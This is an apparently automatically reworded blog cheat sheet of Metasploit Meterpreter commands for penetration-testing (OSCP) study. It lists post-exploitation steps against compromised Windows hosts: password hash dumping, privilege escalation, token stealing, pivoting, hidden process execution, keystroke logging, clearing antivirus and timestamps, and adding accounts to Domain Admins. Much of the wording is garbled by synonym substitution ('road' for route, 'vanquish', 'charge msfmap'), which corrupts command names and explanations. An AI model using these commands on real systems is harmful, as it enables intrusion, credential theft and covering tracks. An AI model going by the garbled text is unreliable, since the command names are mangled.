-->

Oscp - Meterpreter

  Oscp - Meterpreter

Oscp - Meterpreter

Basic Commands

sysinfo getpid getuid ps   ps -S notepad.exe  kill <pid> ipconfig road migrate <PID> getsystem getprivs purpose priv hashdump vanquish background

File System Commands

ls pwd cd del <file> truthful cat <file> edit <file> upload <src_file> <dst_file> download <src_file> <dst_file> getwd getlwd

Port Forwarding

We convey compromised victim1 amongst meterpreter session_id. Background meterpreter together with add together the road below. It volition redirect all traffic for the to a higher house victim2_subnet through victim1. 
route add together <victim2 subnet> <netmask> <session_id>  road -h road listing road delete <victim2_subnet> <netmask> <session+id>
Forwards traffic from port fifty on Kali(localhost) to port p of Target2 through the compromised Target1 
portfwd portfwd add together -l 1111 -p 2222 -r Target2 portfwd take -l 1111 -p 2222 -r Target2

Execute Processes

Execute cmd.exe together with interact amongst it 
execute -f cmd.exe -i
Execute cmd.exe amongst all available tokens 
execute -f cmd.exe -i -t
Execute cmd.exe amongst all available tokens together with larn far a hidden procedure 
execute -f cmd.exe -i -H -t
  1. H Create the procedure hidden from view
  2. a Arguments to top to the command
  3. i Interact amongst the procedure afterwards creating it
  4. 1000 Execute from memory
  5. t Execute procedure amongst currently impersonated thread token
Run Meterpreter-based scripts; for a amount listing banking venture tally the scripts/meterpreter directory 
run <scriptname>

Registry

Interact, create, delete, query, set, together with much to a greater extent than inward the target’s registry 
reg <Command> [OPTIONS]
commands: 
enumkey ->Enumerate the supplied registry telephone substitution createkey / deletekey   ->  Creates/deletes the supplied registry telephone substitution setval / queryval       ->  Set/query values from the supplied registry telephone substitution Options:    -d  ->  Data to shop inward the registry value    -k  ->  The registry telephone substitution    -v  ->  The registry value name

Tokens

use incognito list_tokens -u list_tokens -g impersonate_token DOMAIN_NAME\\USERNAME steal_token PID drop_token rev2self

Sniffing

use sniffer sniffer_interfaces sniffer_dump interfaceID pcapname sniffer_start interfaceID packet-buffer sniffer_stats interfaceID sniffer_stop interfaceID

Post Exploitation

add_user username password -h ip add_group_user “Domain Admins” username -h ip clearav timestomp screenshot keyscan_start keyscan_dump keyscan_stop uictl enable keyboard/mouse setdesktop pose out reboot run post/windows/manager/enable_rdp
+ Run msfmap 
Download it from http://code.google.com/p/msfmap charge msfmap msfmap

References

https://pentestlab.blog/2012/03/26/meterpreter-commands/
https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/


7:22:00 AM  Articles

Next Post
Previous Post
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser